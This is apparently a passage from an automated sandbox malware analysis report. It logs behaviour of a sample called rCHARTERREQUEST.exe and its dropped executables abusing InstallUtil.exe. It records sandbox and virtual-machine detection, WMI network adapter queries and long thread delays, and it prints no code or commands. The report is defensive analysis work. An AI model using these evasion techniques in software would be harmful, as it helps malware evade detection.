                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: rCHARTERREQUEST.exe PID: 7388, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ilsucsfth.exe PID: 8128, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeMemory allocated: 46E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory allocated: 1280000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E20000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29A0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 49A0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeWindow / User API: threadDelayed 2559Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeWindow / User API: threadDelayed 7272Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeWindow / User API: threadDelayed 4402Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeWindow / User API: threadDelayed 5420Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1591Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1606Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeWindow / User API: threadDelayed 3563Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeWindow / User API: threadDelayed 6200Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2311
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1072
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep count: 31 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7452Thread sleep count: 2559 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7452Thread sleep count: 7272 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99766s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99547s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -99094s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98984s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98874s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98633s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98516s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98391s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98251s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -98125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97970s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97813s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97563s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -97110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96860s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96735s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96610s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96360s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -96016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95688s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95563s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95344s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -95103s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94985s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94855s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94641s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exe TID: 7420Thread sleep time: -94312s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exe TID: 7852Thread sleep time: -100000s >= -30000sJump to behavior
